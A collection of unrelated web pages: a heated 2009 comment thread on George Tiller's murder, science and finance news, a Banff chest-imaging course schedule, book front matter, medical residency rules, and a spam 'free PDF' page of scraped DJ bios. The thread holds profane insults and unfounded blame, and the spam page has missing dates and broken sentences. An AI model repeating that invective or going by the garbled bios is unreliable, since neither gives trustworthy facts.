Via KMBC in Kansas City, we learn that Roeder had the number of Operation Rescue’s senior policy adviser Cheryl Sullenger in his car. That would be the Cheryl Sullenger who did a two-year stint in the joint for conspiring to bomb a California abortion clinic in 1988. What is an anti-abortion maniac convicted of criminal use of explosives doing with the phone number for another convicted clinic bomber? Pure coincidence, right?
I could give a shit about jumping to conclusions and conspiracy-thinking. The chickens have come home to roost for Operation Rescue and all the nutjob looney tunes anti-life outfits that spur maniacs to terrorize physicians, clinic workers, patients and the community with acts of, yes, terrorism. I pray to almighty Jeebus that Operation Rescue gets implicated.
Oh yeah…the founder of Operation Rescue, Randall Terry, addressed the National Press Club today and had the following to share:
“The point that must be emphasized over, and over, and over again: pro-life leaders and the pro-life movement are not responsible for George Tiller’s death. George Tiller was a mass-murderer and, horrifically, he reaped what he sowed”
Now, this is me being my typical self, as you say, and saying that to call Randall Terry a dickless motherfucker is an insult to dickless motherfuckers everywhere.
Haha…his Wikipedia page has been updated
Ward June 2, 2009 at 6:51 am #
Well OK then.
Employing the logic and reasoning of the posters on this thread–and at the risk of being accused of “cribbing” from Humanist, here goes:
Yesterday a Muslim fundamentalist, a card-carrying member of the Peace Movement, possibly a colleague of The Humanist, murdered a military recruiter and wounded another in Little Rock, Arkansas. His name is Abdulhakim Mujahid Muhammad–changed from Carlos Bledsoe when he converted to Islam.
How do we know he is a card-carrying member of the Peace Movement? Simple–he murdered a soldier. It is quite possible that he was motivated by websites such as unitedforpeace.org, paxchristiusa.org, or BuffaloPundit.com. How do we know that? Easy–he told police he hates the military.
We fully expect that denials will be forthcoming from peace advocates, to the effect that, “The point that must be emphasized over, and over, and over again: peace leaders and the peace movement are not responsible for William Long’s death. William Long was a mass-murderer and, horrifically, he reaped what he sowed.”
More to come as the story develops. In the meantime, “The chickens have come home to roost for ANSWER and all the nutjob looney tunes anti-soldier outfits that spur maniacs to terrorize army recruiters, recruits and the community with acts of, yes, terrorism. I pray to almighty Damballa that ACORN gets implicated.”
Humanist, I’m beneath your contempt yet you never miss an opportunity to express your contempt for me, going so far as to make up a name for me and using everytime I post something. I always love when people have to post to tell me how little my opinion matters to them or how beneath them I am to not even merit engaging, yet they respond to everything I say, even innocuous stuff.
And really, calling someone by the diminutive form of their names is equivalent to what you’re doing? Really? Well, I had conversations with Jonny on here and he never objected to that. Besides, Jonny allowed himself to be painted as young, immature and inexperienced. It’s what cost him the election. Also, no one seemed to have a problem with the names I used for all the other characters involved in that election. In fact, some found them quite entertaining. I can’t believe how sensitive and thin skinned so many people on here were and still are about Jonny. He moved on long ago, perhaps some of you can finally get over it.
Ward, I know your example is citing a recent terrorist event, but let’s not also forget about all the eco-terrorism that has taken place in recent years. Surely Al Gore should have to answer for much of that, or at least deserve some scrutiny from the Department of Justice.
@ Ward – in your fever-dream of a post, you forgot to include The Black Muslim/Socialist/Facist President B. Hussein Obama welcoming William Ayers to the Oval Office to toast another strike at the US military complex. And Judge Sotomayor announcing at a press conference that she thanks Hispanic Jesus the dead recruiter was white because a wise Latino would be much better in the position.
Ward June 2, 2009 at 11:42 am #
humanist — you said it all, not me.
Judging that your nom-de-blog refers to your own peculiar theology, as opposed to any incidental exposure on your part to The Humanities, I guess I should explain that I was employing a literary device used with some success by Jonathan Swift. If you read your own 12:41 post closely, then mine following, you may notice some vague similarity in language, contents and tone.
@ Ward – the only thing you have in common with Swift is that you both think it’s a grand idea for the poor to sell their children as food to the well-to-do. Except Swift was kidding.
Your post hardly qualifies as satire, as satire usually requires a modicum of wit. And some semblance of reality.
Ward June 2, 2009 at 3:08 pm #
Ah, and of course the card-carrying Operation Rescuer is solidly grounded in fact, eh?
Congrats on being able to find the Wiki entry for “A modest proposal.” Too bad you could not discern that I too was kidding. Looks like it’s another go-around for you in the James Williams Remedial Reading program.
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Home > Volume 95 Issue 10 > Science & Technology Concentrates > New target for anti-inflammatory agents
Issue Date: March 6, 2017
New target for anti-inflammatory agents
Study shows that caspases are secondary targets for nonsteroidal anti-inflammatory drugs
By Stu Borman
News Channels: Biological SCENE
Keywords: drug discovery, NSAIDs, anti-inflammatory, inflammation, caspase, drug targets
Science & Technology Concentrates
Abiotic tooth enamel created
Chemists create colloidal clathrate crystals
Tin-phosphorus anode takes charge of potassium-ion batteries
Platinum-containing cancer drugs have different mechanisms
Peptide-containing nanofibers keep bacterial infections at bay
Computational model of the NSAID fenbufen (green) bound to the active site of caspase-3.
Credit: Cell Chem. Biol.
Researchers have discovered that caspases, enzymes that promote inflammation and cell death, are secondary targets for some nonsteroidal anti-inflammatory drugs (NSAIDs) (CellChem. Biol. 2017, DOI: 10.1016/j.chembiol.2017.02.003). NSAIDs such as Advil and aspirin are primarily cyclooxygenase inhibitors but hit other targets as well, causing side effects such as stomach pain, heartburn, and bleeding. The addition of caspases to the list of NSAID targets could aid understanding of the drugs’ anti-inflammatory effects and help lead to the design of new agents with reduced side effects. Hang Hubert Yin and coworkers at the University of Colorado, Boulder, studied NSAID targeting in cells exposed to inflammatory stimuli that boost caspase production. Such conditions have not been widely used before in NSAID studies, the researchers say, even though patients with inflammatory conditions often take NSAIDs. Yin’s group shows that under inflammatory conditions, some NSAIDs bind to a common caspase active-site motif and therefore inhibit several types of caspases. “We are currently working on novel, selective caspase inhibitors, hoping to develop the next generation of anti-inflammation drugs,” Yin says.
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Can Trump become the catalyst for Asia's century?
Isolationism has been another major strand of President Donald Trump's America First policy . Reduced US commitment to existing alliances and force structures that underpin an America-led world order will be disruptive, but not necessarily disastrous.
ET Bureau
Updated: January 23, 2017, 10:05 IST
Protection will bring factories, jobs and prosperity back to the US, claimed America's new president in the course of his inaugural address. He is mistaken. The Great Depression of the 1930s was made worse by every country trying to protect its own industry from external competition. It was because the world had the sense to draw this lesson that the General Agreement on Trade and Tariffs came into being, later to morph into today's World Trade Organisation, with the mission to keep trade open and rule-based. Even if the US turns protectionist, the rest of the world should resolutely refuse to join in.
Isolationism has been another major strand of President Donald Trump's America First policy . Reduced US commitment to existing alliances and force structures that underpin an America-led world order will be disruptive, but not necessarily disastrous. If the US does indeed go ahead and disengage partially in Asia, the result would be for China to move in to occupy the strategic space vacated by the US. If Japan and South Korea are egged on to acquire military capability to compensate for a smaller American defence umbrella, India's own strategic capability would have to be scaled up much faster. Pakistan would try to keep pace but is unlikely to sink as the USSR did, thanks to China's support and patronage. If a Trump administration decides to tear up the Iran nuclear deal, as it well might, there would be yet another nuclear power in Asia, sooner rather than later. Europe would feel similar compulsions to beef up their own defence capability . Budget allocations across the world would see the share of defence go up.Except in the US, where construction could get a boost, whether of a wall along the southern border or of better roads, railways and power grids.
Then again, Trump might not follow up speech with action. He might change his mind, or his staff might change it for him. What can be said is that self-restricting economic and strategic policies are likely to shrink American power relative to its competitors'. That is good news for China.
Analysis and Insights
1 week agoUS-Iran tensions: India's export to gulf nations will get impacted
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3 months agoSpotify CFO to retire in January
3 months agoGoodbye Mario Draghi as Lagarde era nears for ECB
3 months agoGlobal economic risks call for strengthening multilateral co-operation: Sitharaman
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Alberta August 3-6, 2020
Accreditation & CME Certificates
HRCT and Diffuse Lung Disease
Time Session Speaker
7:00-7:30am Registration, Exhibits, and Continental Breakfast
7:30-7:40 The pulmonary Lobule on HRCT Richard Webb, MD
7:40-8:00 HRCT Patterns: Reticular Opacities and Differential Diagnosis Richard Webb, MD
8:00-8:30 UIP and IPF: Diagnostic Guidelines Nestor L. Müller, MD, PhD, FRCPC
8:30-8:50 HRCT Patterns: Nodular Lung Disease and Differential Diagnosis Richard Webb, MD
8:50-9:10 Sarcoidosis Richard Webb, MD
9:10-9:30 HRCT Patterns: Ground-Glass Opacity, Consolidation, and Differential Diagnosis Richard Webb, MD
9:30-9:40 Questions, Answers, and Discussion
9:40-9:50 Coffee Break and Exhibits
9:50-10:05 Organizing Pneumonia (OP) Isabela Müller, MD
10:05-10:20 Nonspecific Interstitial Pneumonia (NSIP) Nestor L. Müller, MD, PhD, FRCPC
10:20-10:50 HRCT Patterns: Emphysema, Lung Cysts & Mosaic Perfusion David P. Naidich, MD
10:50-11:20 Connective Tissue Disease Nestor L. Müller, MD, PhD, FRCPC
11:20-11:50 Hypersensitivity Pneumonitis Nestor L. Müller, MD, PhD, FRCPC
11:50-12:10 Case based review Richard Webb, MD
12:10-12:20 Questions, Answers, and Discussion
HRCT and Airways Disease
7:30-7:45 Technique and Basic Principles David P. Naidich, MD
7:45-8:15 Trachea Richard Webb, MD
8:15-8:45 Bronchietasis Richard Webb, MD
8:45-9:30 Central Airways: CT-Bronchoscopic Correlations David P. Naidich, MD
9:55-10:25 Small Airway/Bronchiolar Disease David P. Naidich, MD
10:25-10:55 Potential Pitfalls in the Interpretation of HRCT Nestor L. Müller, MD, PhD, FRCPC
10:55-11:35 An Algorithmic Approach to Diffuse Lung Disease David P. Naidich, MD
11:35-11:55 Case based review David P. Naidich, MD
Chest Radiograph, Cardiac, Lung Nodule, Cancer
7:30-8:00 Chest Radiograph: A Few Signs and Pitfalls Nestor L. Müller, MD, PhD, FRCPC
8:00-8:30 What the Heck is that? – Man made cardiovascular devices in the Thorax Suhny Abbara, MD
8:30-9:00 Chest Radiograph: Case based discussion Nestor L. Müller, MD, PhD, FRCPC
9:00-9:30 Cardiac MRI Made Easy Suhny Abbara, MD
9:55-10:25 How and When to do Cardiac CT Suhny Abbara, MD
10:25-10:55 Non Small Cell Lung Cancer – CT-Pathology Correlation David P. Naidich, MD
10:55-11:25 Fleischner Guidelines – Incidental Nodules David P. Naidich, MD
11:25-11:40 Fleischner Guidelines for Measuring SPN’s David P. Naidich, MD
11:40-12:10 Miscellaneous Chest Diseases: a case-based review Nestor L. Müller, MD, PhD, FRCPC
AI, Heart, Pericardium, Mediastinum and Pleura
7:30-8:00 Artificial Intelligence – Concepts and Lung Cancer Applications David P. Naidich, MD
8:00-8:30 Cardiothoracic applications of spectral CT Sunhy Abbara, MD
8:30-9:00 Congenital Lung Lesions Richard Webb, MD
9:00-9:30 Systematic Approach to Congenital Heart Disease Sunhy Abbara, MD
9:55-10:40 Mediastinal Masses Richard Webb, MD
10:40-11:10 Tumors of the Heart and Pericardium Suhny Abbara, MD
11:10-11:55 CT of Pleural Disease Richard Webb, MD
11:55–12:15 Case based review Sunhy Abbara, MD
12:15–12:25 Questions, Answers, and Discussion
Course Directors & Faculty
David Naidich MD did his Radiology residency and body imaging fellowship at the Johns Hopkins Hospital Baltimore Md, following which he joined the Division of Thoracic Imaging at the now NYU-Langone Medical Center in 1980. In 2015 Dr. Naidich became Emeritus Professor at NYU, a position he still holds. Dr. Naidich’s areas of expertise include: lung cancer, including as a pioneer in the development of low-dose CT imaging and lung cancer screening; development of the Fleischner guidelines for managing incidental pulmonary nodules; diffuse interstitial lung diseases; and CT evaluation of the airways. He is the author of over 200 peer reviewed article as well as co-author, along with Dr’s Webb and Muller, of the definitive HRCT of the Thorax, now in its 5th edition. More interestingly he is a member of a renown family of Academic Radiologists, including his father, nephew, two first cousins, and three second cousins. More important, he is thoroughly adored by his loving wife, Jocelyn, and son Zachary, and daughter-in-law Madeleine.
Dr. Nestor Müller did his residency in Radiology at The University of British Columbia followed by a fellowship in Chest Radiology at UCSF with Gordon Gamsu and the incomparable Rick Webb, before joining the Radiology Staff at the Vancouver General Hospital and the University of British Columbia in 1984. He became Professor of Radiology at UBC in 1992 and was Head and Medical Director of the Department of Radiology at the VGH and Chairman of the Department of Radiology UBC from 2000 until 2010. He was President of the Society of Thoracic Radiology in 1996 and has been a member of the Fleischner Society since 1988. Dr. Müller has authored or coauthored more than 450 publications in scientific journals and has published 17 books. He has won a number of awards, including recognition by the Editor of the American Journal of Roentgenology as being one of the “3 Wise Men in Radiology” as an outstanding teacher and scholar (2003), Gold Medal of the Brazilian College of Radiology (2010) and Gold Medal of the Society of Thoracic Radiology (2011).
Richard Webb attended the Univ of California San Francisco for medical school, residency, and fellowship. He has been Chief of Thoracic Imaging at UCSF and the Hideyo Minagi Professor of Radiology. He is Past President of the Society of Thoracic Radiology and has been a member of the Fleischner Society since 1984. He is editor emeritus of the Journal of Thoracic Imaging, has authored or coauthored more than 200 scientific papers and 9 books in multiple editions and languages. He has lectured in more than 35 different countries and has received the Fleischner medal and the Gold medal of the Society of Thoracic Radiology (as have Drs. Muller and Naidich).
Suhny Abbara, M.D., FACR, FSCCT
Chief, Cardiothoracic Imaging
Isabela Müller, MD
Fairmont Banff Springs
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Canada’s “Castle in the Rockies”, has been providing legendary hospitality to their guests for more than 130 years.
Enjoy a short stroll from the hotel and explore the charming town of Banff, Alberta. Discover local galleries and museums, upscale shopping and restaurants, year-round Banff Lake Louise events, and popular local attractions, including the Banff Gondola and the mineral rich Banff Upper Hot Springs.
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For shuttle and sedan service to Banff, contact Banff Airporter at 1-403-762-3330, or online at banffairporter.com. Receive a 15% discount on scheduled shuttle services by using Promo Code “CMES” on the final payment page.
Destination Information:
Located in the foothills of the Rocky Mountains, Banff National Park is Canada’s oldest national park, and was one of the original stops on the Canadian Pacific Railway. Originally centered around the Banff Hot Springs, the park later grew to include nearby Lake Louise and the Columbia Icefield. One of the most popular parks in North America, Banff National Park is visited by over three million visitors annually.
Gondolas are the best way to obtain a sense of the majesty and enormity of the mountains, and are available in Banff, Lake Louise and Sunshine Village. Elk, caribou, grizzly bears and gray wolves are native to the Park. Historic sites and museums include the Banff Centre, Banff Park Museum, Whyte Museum, Canadian Ski Museum West, Buffalo Nations Luxton Museum, and the Cave & Basin National Historic Site. The town of Banff offers a variety of restaurants, shops and art galleries.
Learn more – detailed Banff Travel Tips on these web pages:
fairmont.com/banff-springs/destination-guide/
banfflakelouise.com
travelalberta.com/us/places-to-go/canadian-rockies/banff
Toll Free: 1-855-383-7116 – Direct: +1-(650) 440-4424
CME Science © 2018 All Rights Reserved. | Developed By: Website Tigers.
Login to Webb, Müller & Naidich: A Masters Course in Chest Imaging
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Author Responsibilities
Editors: Qualifications and Responsibilities
Ethics Approval and Informed Consent
Hardcover Copy
Manuscript Preparation Guidelines
Publishing Fee
PubMed Indexing
Web of science Indexing
Holger Husi, Dr sc nat (ed)
Institute of Cardiovascular and Medical Sciences BHF Glasgow Cardiovascular Research Centre University of Glasgow Inverness, UK; Division of Biomedical Sciences Centre for Health Science University of Highlands and Islands UK
Our understanding of biology has undergone a revolution in the past 20 years, driven by our ability to capture, store, interrogate and analyze the ever-increasing volumes of ‘omics’ data. Computational Biology, an integrated approach employing high performance computers, state-of-the art software and algorithms, mathematical modeling and statistical analyses have enabled us to unravel the seemingly impenetrable complexity of biological systems. This book draws together many of the latest cutting-edge developments in the field of Computational Biology. Each chapter draws on the expertise of leading researchers in the field to highlight the utility of specific technologies. The breadth of the text is impressive - from integrative biology in human diseases through the various branches of epigenomics, metabolomics and proteomics to biological sequencing and deep learning. Computational biology approaches for image-based analysis of multicellular spheroids, feature selection using entropy and cellular cryo-electron tomography structural pattern mining are covered. In addition, the key role of statistics in the analysis of high-dimensional multiset omics data and RNA sequencing are discussed in dedicated chapters. This book would have broad appeal to anyone with an interest in cutting edge computational biology.
Pages i-vi
Ian Megson…..Page vii
Holger Husi…..Pages ix-xi
Pages xiii-xvii
Chapter 1: An Introduction to Image-Based Systems Biology of Multicellular Spheroids for Experimentalists and Theoreticians
Sabine C. Fischer…..Pages 1-18
Chapter 2: Integrative Biology Approaches Applied to Human Diseases
Alysson H. Urbanski, José D. Araujo, Rachel Creighton, Helder I. Nakaya…..Pages 19-36
Chapter 3: Deep Learning in Omics Data Analysis and Precision Medicine
Jordi Martorell-Marugán, Siham Tabik, Yassir Benhammou, Coral del Val, Igor Zwir, Francisco Herrera, Pedro Carmona-Sáez…..Pages 37-53
Chapter 4: Biological Sequence Analysis
Usman Saeed, Zainab Usman…..Pages 55-69
Chapter 5: Multivariate Statistical Methods for High-Dimensional Multiset Omics Data Analysis
Attila Csala, Aeilko H. Zwinderman…..Pages 71-83
Chapter 6: Statistical Methods for RNA Sequencing Data Analysis
Dongmei Li…..Pages 85-99
Chapter 7: Computational Epigenomics: From Fundamental Research to Disease Prediction and Risk Assessment
Mohamed-Amin Choukrallah, Florian Martin, Nicolas Sierro, Julia Hoeng, Nikolai V. Ivanov, Manuel C. Peitsch…..Pages 101-118
Chapter 8: Computational Approaches in Proteomics
Karla Cervantes Gracia, Holger Husi…..Pages 119-142
Chapter 9: Cheminformatics and Computational Approaches in Metabolomics
Marco Fernandes, Bela Sanches, Holger Husi…..Pages 143-159
Chapter 10: Feature Selection in Microarray Data Using Entropy Information
Ali Reza Soltanian, Niloofar Rabiei, Fatemeh Bahreini…..Pages 161-174
Chapter 11: Template-Based and Template-Free Approaches in Cellular Cryo-Electron Tomography Structural Pattern Mining
Xindi Wu, Xiangrui Zeng, Zhenxi Zhu, Xin Gao, Min Xu…..Pages 175-186
Holger Husi, Dr sc nat, Institute of Cardiovascular and Medical Sciences BHF Glasgow Cardiovascular Research Centre University of Glasgow Inverness, UK; Division of Biomedical Sciences Centre for Health Science University of Highlands and Islands UK
Holger Husi is a senior research fellow in Bioinformatics and Biostatistics at the University of the Highlands and Islands and the University of Glasgow. Originally from Switzerland, where he completed his doctoral training at Novartis, Basel, and the Swiss Federal Institute of Technology (ETH), Zurich, in immunology and the mode of action of immunosuppressants, he specialized in large-scale biosystems investigations and analysis, with an emphasis on human disease analytics. After his first postdoctoral training at Columbia University, NY, USA, he briefly worked for a pharmaceutical company in Austria, and then worked for more than 10 years at the University of Edinburgh. This was followed by a move to the University of Glasgow, where he still holds a position, and the University of the Highlands and Islands in Inverness as principal investigator (PI) in Bioinformatics, Biostatistics and Systems Biology. Over the last three decades, he has extensively published in the area, from method development and data acquisition, databases, and big data handling, through to integrative Systems Biology approaches in order to understand complex biological systems. His investigations covered areas in neuroscience, renal complications, cardiovascular disorders, pulmonary and autoimmune diseases, as well as muscle wasting and cancer. He is the lead of the Pan-omics Database Initiative.
Copyright (c) 2019 Codon Publications
Details about the available publication format: Front Matter
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Thomas Simms
The Reserve Bank of India’s Regulatory Sandbox Accepts Blockchain, Excludes Crypto
Fintech firms can put blockchain technology to the test, but cryptocurrency projects are excluded, India’s central bank has announced.
The Reserve Bank of India’s regulatory sandbox will accept blockchain projects, but excludes cryptocurrency-related projects like initial coin offerings
4989 Total views
142 Total shares
The Reserve Bank of India (RBI) has announced the terms of its regulatory sandbox in report on April 18. Per the terms of the sandbox, various applications of blockchain technology can be tested, while cryptocurrency-related projects are clearly excluded.
Sandboxes are used by regulators around the world, including the Financial Conduct Authority in the U.K., so fintech companies can put their innovations to the test with a small number of consumers over a set time period.
Almost three years after the RBI began reviewing its framework to respond to the dynamics of the “rapidly evolving” fintech market, India’s central bank has concluded “innovative technology” built on blockchain can be sampled by the public — giving the institution a chance to assess whether new regulations are needed to protect consumers.
The RBI says fintech companies and consumers also benefit from this arrangement. While blockchain firms can “test a product’s viability without the need for a larger and more expensive roll-out,” the public could benefit from “reduced costs and improved access to financial services.”
However, the report does admit that “innovators may lose some flexibility and time” by embarking on the sandbox process, and adds that completing these tests do not guarantee that further regulatory approval will not be needed.
Detailing the “innovative technologies” given the green light to apply for sandbox testing, the RBI lists blockchain platforms along with mobile-based payment and digital identity software, data analytics, and artificial intelligence or machine learning applications. Eligible sectors for “innovative products and services” include retail payments, money transfer services, digital Know Your Customer checks, smart contracts and cybersecurity products.
As well as cryptocurrencies, platforms which enable crypto assets to be traded and invested — as well as initial coin offerings — have been excluded. Products and services already banned by regulators or India’s government are also ineligible to apply.
Cointelegraph reported last April that the RBI said it would no longer provide services to people or businesses who deal with cryptocurrencies. Five months later, one of India’s biggest crypto exchanges, Zebpay, announced that it had ceased all trading due to “extremely difficult” conditions.
The Reserve Bank of India had been pursuing the idea of releasing its own digital currency, but these plans were postponed at the start of the year. Amid growing uncertainty about crypto regulation in the world’s second-most populous country, February saw the Supreme Court give Indian authorities a four-week deadline to issue regulations or face the threat of the court releasing a judgment themselves.
#Blockchain News
#Cryptocurrencies
#Bitcoin Regulations News
#Reserve Bank of India
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About this submission
Tim's got a secret and it isn't until a chance encounter at a bar that he decides it's time to face his inner demons. ( Drama , Short )
Inspired by an idea from the mind of Max Landis.
First Draft from a work-in-progress full length film.
Austin Valdez
Palm Springs, CA, USA
Growing up as a Bay Area Baby, I've always wanted to work in the film industry. Today, I'm doing just that. Collaborating with ambitious creative talent around the world to bring amazing projects to life, I've been successful in blending my skill set as a business savvy producer with my creative passion for storytelling, resulting in a balanced concoction of logic and imagination. "imagic", if you will. I'm-- uh, still working on the name.... Each project, I constantly find myself wearing different hats. My roles include, but are not exclusive to: - Actor - Singer - Musician - Screen Writer - Director - Producer - Camera Operator - Storyboard Artist - Lighting - Set Design - Editing - Distribution - Most recently, the studio I helped co-found is releasing it's newest web series called "How To Write Your Soul" and I hope to one day own and operate my own production company out here in the Coachella Valley. All these experiences and goals have been essential in servicing my ultimate passion- to be a Story Teller. It's a fantastic thing, taking on that mantle, because storytellers use imagination to restore order to the world. To instill hope. I truly believe that. It's a passion that burns bright. So, how about we tell a story together?
Recent Submissions for Strangers on a Train, on a Plane, at a Bar!
The Brig
Benjamin MulHolland
2 Train Business
Erick Asa
MILLY & CLIVE
Jill Marie McMurray
Jackie Perez
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Contact and Verifications
Mayo Clinic School of Graduate Medical Education at Mayo Clinic accepts highly qualified residents and fellows for its training programs.
To perform the essential functions of the specialty and meet the standards of the curriculum, applicants should possess these qualities:
Ability to learn and function in a variety of settings
Emotional stability and maturity
Physical and mental stamina
Sound judgment
Successful candidates exhibit strong qualifications for the specialty they wish to pursue.
Mayo Clinic School of Graduate Medical Education residency and fellowship programs usually begin July 1.
General admissions requirements
Medical, surgical and dental residencies and fellowships are open to U.S. citizens, permanent U.S. immigrants and international applicants as follows:
Medical and surgical residencies are open to qualified graduates of accredited U.S. and Canadian medical schools.
Dental specialty residencies and fellowships are open to qualified graduates of approved U.S. and Canadian dental schools.
All graduates from medical schools outside the U.S. and Canada must be certified by the Educational Commission for Foreign Medical Graduates (ECFMG) to qualify for admission. Information about certification and visa sponsorship, if required, is available from the ECFMG website.
Mayo Clinic supports ECFMG J-1 visa sponsorship for residents and fellows enrolled in graduate medical education. Applicants must refer to the specific program website to confirm if the program meets all requirements for ECFMG J-1 visa certification. Mayo Clinic may also support an H-1B temporary work visa under the following circumstances:
J-1 visa sponsorship is unavailable (the program is either not eligible for ECFMG certification or non-ACGME accredited and non-ABMS recognized).
A foreign national is a U.S. medical or dental school graduate or holds current H-1B status for graduate medical education at another school.
To enable recruitment that fits Mayo's strategic priorities.
H-1B eligibility requirements include:
Successful completion of USMLE Steps 1, 2CK, 2CS and 3 at time of appointment
Eligibility for appropriate state medical licensure (Arizona, Florida, Minnesota)
Program completion within six-year H1-B time limit
Is not subject to the two-year home return requirement (current J-1 visa holders are not eligible)
Applicants must upload scanned copies of transcripts from each graduate school, dental school, and medical school attended and must also provide certified or notarized English translations of documents originally written in a language other than English.
Residency applicants who receive an appointment need to request an official transcript from their school(s).
Fellowship applicants who receive an appointment may have the official school transcript request waived if it was included within their submitted application.
Successful candidates must fulfill all applicable licensure eligibility requirements before starting a Mayo Clinic School of Graduate Medical Education residency or fellowship.
A preadmission health review and current immunization record are required prior to starting a Mayo Clinic School of Graduate Medical Education program.
Prospective residents and fellows must pass a criminal background check and drug screening.
Appointment contract information
Mayo Clinic School of Graduate Medical Education extends its residency and fellowship appointment offers through:
National Resident Matching Program
SF Match
ApplyYourself (program director)
Appointments are confirmed via a written letter that constitutes a residency or fellowship appointment to Mayo Clinic School of Graduate Medical Education. You will be asked to sign and return one copy of the appointment letter.
View a sample appointment letter
Trainee policies and trainee job description
View a summary of terms and conditions of appointment
View trainee job description (including technical performance standards)
Academics ▸ Residencies and Fellowships ▸ Admissions and Benefits
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Women, Newborn, and Children’s Health
Diarrhea and Pneumonia
Maternal, Newborn and Reproductive Health
Health Financing
Cross-Cutting Experts
Global Health Sciences
Mesoamerica and Hispaniola
2016 February 29
Scaling Up Zinc and ORS: New Report Published
By the end of 2015, diarrhea remained a leading killer of children under 5. However, important progress has been made to scale up zinc and oral rehydration salts (ORS), which together are the recommended treatment for childhood diarrhea. Since the release of the WHO/UNICEF Joint Statement for Clinical Management of Acute Diarrhea in 2004, many national governments and local partners have launched large-scale efforts that have effectively addressed local barriers to access.
Progress over a Decade of Zinc and ORS Scale-up: Best Practices and Lessons Learned aims to share these experiences and consolidate lessons from countries and child health partners. This includes a series of case studies outlining specific approaches, lessons learned, and global resources to support interventions for securing an enabling environment, ensuring wide availability of zinc and ORS supply, and improving demand among providers and caregivers – in both public and private sectors.
Information was gathered from members of the Diarrhea & Pneumonia Working Group, co-chaired by the Clinton Health Access Initiative, Inc. (CHAI) and UNICEF, and other experts involved in child health programs. CHAI’s Essential Medicines Program aims to catalyze significant scale-up of treatment for child diarrhea and pneumonia, partnering with governments and local stakeholders in Ethiopia, India, Kenya, Nigeria, and Uganda.
For more information, contact Nancy Goh.
‘We have come so far’: Getting oxygen into local hospitals in Uganda
Clinton Health Access Initiative releases 2018 Annual Report
How a simple diarrhea treatment can save thousands of children’s lives
Kenya introduces ambitious efforts to tackle pneumonia
Women who inspire us: International Women’s Day 2018
Universal Health
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Manual Imagine
Free download. Book file PDF easily for everyone and every device. You can download and read online Imagine file PDF Book only if you are registered here. And also you can download or read online all Book PDF file that related with Imagine book. Happy reading Imagine Bookeveryone. Download file Free Book PDF Imagine at Complete PDF Library. This Book have some digital formats such us :paperbook, ebook, kindle, epub, fb2 and another formats. Here is The CompletePDF Book Library. It's free to register here to get Book file PDF Imagine Pocket Guide.
He founded synth pop duo All Hail the Silence with singer Christian Burns in , and their debut album, Daggers, was released in Born and raised in the Washington, D. Even while he was studying string arrangement and orchestration, Transeau listened to Depeche Mode and Yes. Realizing that producing electronic music was his true passion, he was soon back in Washington, D.
The tracks became club hits in Britain, routinely played by super DJs like Sasha and Paul Oakenfold for their epic, symphonic qualities, which worked well as a sort of climax at clubs like Cream and Ministry of Sound. One remix largely changed that. By , England received a wave of pop hits in the same line pioneered by Transeau; dubbed dream house, artists like Robert Miles and Sash! Movement in Still Life followed in , moving away from trance towards breaks, while also exploring hip-hop and alternative rock.
BT was also moving beyond his own musical sphere during this time by venturing into film. His effort, This Binary Universe, continued his exploration of other genres with ambient music and more experimental sounds filling the album. A tour with Thomas Dolby followed. In late , BT announced he was putting the finishing touches on a double album, These Hopeful Machines. It received a Grammy nomination. A mix album of the same title was later issued.
His tenth full-length arrived later in the year. His first score for a Bollywood film, Ittefaq, was released in Daggers, the debut full-length by All Hail the Silence, appeared in early Jesse Kardon, better known as Subtronics, is a year-old Philadelphia born dubstep producer specializing in all things robotic. His work is heavily influenced by the likes of Rusko, Skism, Tomba and Downlink, and the collective efforts of the underground dubstep community. Taking on a core group of followers over SoundCloud in the first few years, he has grown exponentially in the past few months, gaining support from a plethora of bass music legends.
Subtronics has recently collaborated with the likes of Uber, MurDa, Ecraze, and Samplifire, adding to his already expansive solo discography, garnering him attention from major labels. The track was played out at every major festival in the summer of , being supported by the likes of Adventure Club, Knife Party, 12th Planet, and many others. Fresch brand.
Fresch has continued to gain serious momentum over the course of the last year. Fresch has quickly solidified himself as one of the most unique emerging dance music artists. Over the summer of , Dr. Each installment features a 30 minute Dr. Fresch mix followed by a 30 minute guest mix. The summer also brought Dr. Chien is currently working on new music to be released later this year.
Reid has been on the forefront of bass music for more than a decade. Since then, she has torn up venues across the United States and Europe as well as in such exotic locales as Costa Rica. In , she co-founded the influential label Play Me Records, whose output helped usher in the North American Bass music movement. With her no holds barred attitude and fierce, fearless work ethic, Reid Speed is a true queen amongst DJs. Her storied career has been based in constant growth and she shows no signs of slowing down. Leah is cultivating her music in an original way that is breaking the barriers of EDM and mainstream pop by combining her talents as a DJ, producer, singer and songwriter.
Leah is quickly building a name for herself, and gaining passionate fans and momentum on social media, billboard charts, the festival scene, and on dance floors across the globe. An innovative and pioneering producer, Niles Hollowell-Dhar is best known as KSHMR, a globally acclaimed artist from Berkeley, California, known for a signature sound merging electronic rhythms with ethnic West Asian instrumentation. With the confidence from a few successes in the dance world, Niles decide to leave pop music behind, and KSHMR was born. Joined by live classical and ethnic instruments, as well as traditional Indian dancers, KSHMR presented his music in a way that it had never been heard.
The response was overwhelming and festivals around the world were eager to take part. His new label, Dharma Worldwide, was created to be a hub for for like-minded producers. Though young at 23 years of age, REZZ is anything but an amateur. Producing state of the art, genre-bending works, while striking a sharp balance between bass heavy and minimal tech compositions, she oozes originality and stands shoulder to shoulder with the very best in the electronic music scene.
Starting out as a local DJ in her hometown of Niagara Falls, she was still a teen when she decided that music production was the path she would take. After studying sound design extensively at home and psychology as an aid to her creative process, her experimentation, dedication and hard work paid off in paving the way for a long career ahead as a highly regarded producer of downtempo soundscapes. She began to build a following on Soundcloud with a series of free releases that caught the ears of electronic music icons Skrillex and deadmau5.
The album consistently portrays menacing soundscapes that REZZ is known for through innovative singles and collaborations. Berkeley, California based producer Thriftworks offers his own uniquely original take on forward thinking electronic music, weaving eclectic samples and explosive modern bass that continually pushes the envelope while taking the art of beat-crafting to new heights. Garnering much praise from fans and critics alike with his steady stream of new material, Thriftworks is quickly becoming known as one of the finest up and coming experimental producers with his outside the box sound and unclassifiable style.
These sounds activate the senses, enrapture the mind, move the body and leave audiences begging for more. In times where it becomes easiest to feel anything but, Louis the Child is here to make you happy. Currently in the midst of an extensive spring tour, Louis the Child is fully prepared to bring smiles to the crowds of Bonnaroo, Hangout, Middlelands, and more major festivals across the globe this summer.
